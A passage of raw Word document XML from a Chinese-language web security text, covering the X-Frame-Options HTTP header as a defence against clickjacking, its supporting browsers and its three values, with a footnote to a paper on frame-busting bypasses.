            <w:spacing w:val="-2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>u</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>d</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>y</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>o</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>f</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>c</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>li</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>c</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>k</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>j</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>ac</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>k</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>i</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>n</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>g</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>v</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>u</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>n</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>era</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>b</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>iliti</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>e</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>at</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>pop</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>u</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>ar</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>i</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>t</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>e</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="10"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:history="true" w:anchor="_bookmark11">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>”，详细讲述了各种绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>的方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1055" w:val="left" w:leader="none"/>
          <w:tab w:pos="1056" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="117" w:after="0"/>
        <w:ind w:left="1055" w:right="0" w:hanging="852"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="135"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="78"/>
        <w:ind w:left="203" w:right="226" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frame busting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>存在被绕过的可能，所以我们需要寻找其他更好的解决方案。一个比较</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>好的方案是使用一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>头——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>X-Frame-Options </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>可以说是为了解决 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>而生的，目前有以下浏览器开始支持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="415" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="75" w:after="0"/>
        <w:ind w:left="414" w:right="6563" w:hanging="211"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>8+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3952;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,19.081446pt" to="158.16pt,19.081446pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark11" w:id="68"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>6 </w:t>
      </w:r>
      <w:hyperlink r:id="rId68">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>http://seclab.stanford.edu/websec/framebusting/framebust.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="912" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="176" w:after="0"/>
        <w:ind w:left="911" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Opera 10.50+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="912" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="911" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>4+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="912" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="911" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId69">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>Chrome</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="-1"/>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>4.1.249.1042+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Firefox </w:t>
      </w:r>
      <w:hyperlink r:id="rId70">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>3.6.9 </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(or earlier with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId71">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>NoScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>它有三个可选的值：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DENY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SAMEORIGIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ALLOW-FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="202" w:right="224" w:firstLine="401"/>
        <w:jc w:val="both"/>
